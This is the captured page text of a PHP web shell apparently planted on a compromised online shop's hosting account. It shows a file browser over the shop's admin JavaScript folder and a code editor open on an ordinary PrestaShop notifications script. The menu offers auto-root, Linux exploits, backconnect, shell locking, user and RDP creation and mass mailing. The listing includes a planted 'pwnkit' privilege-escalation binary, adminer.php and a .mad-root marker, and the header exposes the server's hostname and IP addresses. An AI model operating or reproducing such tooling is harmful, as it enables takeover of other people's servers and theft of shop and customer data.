Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.153
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
cropper
[ DIR ]
drwx---r-x
jquery
[ DIR ]
drwx---r-x
tiny_mce
[ DIR ]
drwx---r-x
vendor
[ DIR ]
drwx---r-x
.htaccess
275
B
-rw----r--
.mad-root
0
B
-rw-r--r--
admin-categories-tree.js
9.14
KB
-rw----r--
admin-dashboard.js
9.53
KB
-rw----r--
admin-dnd.js
5.08
KB
-rw----r--
admin-products.js
52.88
KB
-rw----r--
admin-scene-cropping.js
6.9
KB
-rw----r--
admin.js
42.12
KB
-rw----r--
adminImport.js
3.85
KB
-rw----r--
admin_carrier_wizard.js
23.73
KB
-rw----r--
admin_order.js
27.2
KB
-rw----r--
admin_themes.js
2.18
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
attributesBack.js
5.65
KB
-rw----r--
autoload_classmap.php
0
B
-r--r--r--
date.js
11.25
KB
-rw----r--
fileuploader.js
34.63
KB
-rw----r--
hookLiveEdit.js
9.41
KB
-rw----r--
index.php
1.24
KB
-rw----r--
login.js
4.8
KB
-rw----r--
notifications.js
3.85
KB
-rw----r--
price.js
8.84
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
retro-compat.js.php
4.7
KB
-rw----r--
rtl.js
1.39
KB
-rw----r--
tinymce.inc.js
1.72
KB
-rw----r--
tools.js
16.37
KB
-rw----r--
validate.js
20.67
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notifications.js
$(document).ready(function() { var hints = $('.translatable span.hint'); if (youEditFieldFor) hints.html(hints.html() + '<br /><span class="red">' + youEditFieldFor + '</span>'); var html = ""; var nb_notifs = 0; var wrapper_id = ""; var type = new Array(); $(".notifs").click(function(){ var wrapper_id = $(this).parent().attr("id"); $.post( "ajax.php", { "updateElementEmployee" : "1", "updateElementEmployeeType" : $(this).parent().attr('data-type') }, function(data) { if (data) { $("#" + wrapper_id + "_value").html(0); $("#" + wrapper_id + "_number_wrapper").hide(); } } ); }); // call it once immediately, then use setTimeout if refresh is activated getPush(autorefresh_notifications); }); function getPush(refresh) { $.ajax({ type: 'POST', headers: {"cache-control": "no-cache"}, url: 'ajax.php?rand=' + new Date().getTime(), async: true, cache: false, dataType : 'json', data: {"getNotifications" : "1"}, success: function(json) { if (json) { // Set moment language moment.lang(full_language_code); // Add orders notifications to the list html = ""; $.each(json.order.results, function(property, value) { html += "<a href='index.php?tab=AdminOrders&token=" + token_admin_orders + "&vieworder&id_order=" + parseInt(value.id_order) + "'>"; html += "<p>" + order_number_msg + " <strong>#" + parseInt(value.id_order) + "</strong></p>"; html += "<p class='pull-right'>" + total_msg + " <span class='total badge badge-success'>" + value.total_paid + "</span></p>"; html += "<p>" + from_msg + " <strong>" + value.customer_name + "</strong></p>"; html += "<small class='text-muted'><i class='icon-time'></i> " + moment(value.update_date).fromNow() + " </small>"; html += "</a>"; }); if (parseInt(json.order.total) > 0) { $("#list_orders_notif").empty().append(html); $("#orders_notif_value").text(json.order.total); $("#orders_notif_number_wrapper").removeClass('hide'); } else $("#orders_notif_number_wrapper").addClass('hide'); // Add customers notifications to the list html = ""; $.each(json.customer.results, function(property, value) { html += "<a href='index.php?tab=AdminCustomers&token=" + token_admin_customers + "&viewcustomer&id_customer=" + parseInt(value.id_customer) + "'>"; html += "<p>" + customer_name_msg + " <strong>#" + value.customer_name + "</strong></p>"; html += "<small class='text-muted'><i class='icon-time'></i> " + moment(value.update_date).fromNow() + " </small>"; html += "</a>"; }); if (parseInt(json.customer.total) > 0) { $("#list_customers_notif").empty().append(html); $("#customers_notif_value").text(json.customer.total); $("#customers_notif_number_wrapper").removeClass('hide'); } else $("#customers_notif_number_wrapper").addClass('hide'); // Add messages notifications to the list html = ""; $.each(json.customer_message.results, function(property, value) { html += "<a href='index.php?tab=AdminCustomerThreads&token=" + token_admin_customer_threads + "&viewcustomer_thread&id_customer_thread=" + parseInt(value.id_customer_thread) + "'>"; html += "<p>" + from_msg + " <strong>" + value.customer_name + "</strong></p>"; html += "<small class='text-muted'><i class='icon-time'></i> " + moment(value.update_date).fromNow() + " </small>"; html += "</a>"; }); if (parseInt(json.customer_message.total) > 0) { $("#list_customer_messages_notif").empty().append(html); $("#customer_messages_notif_value").text(json.customer_message.total); $("#customer_messages_notif_number_wrapper").removeClass('hide'); } else $("#customer_messages_notif_number_wrapper").addClass('hide'); } if (refresh) setTimeout("getPush(1)", 120000); } }); }
Close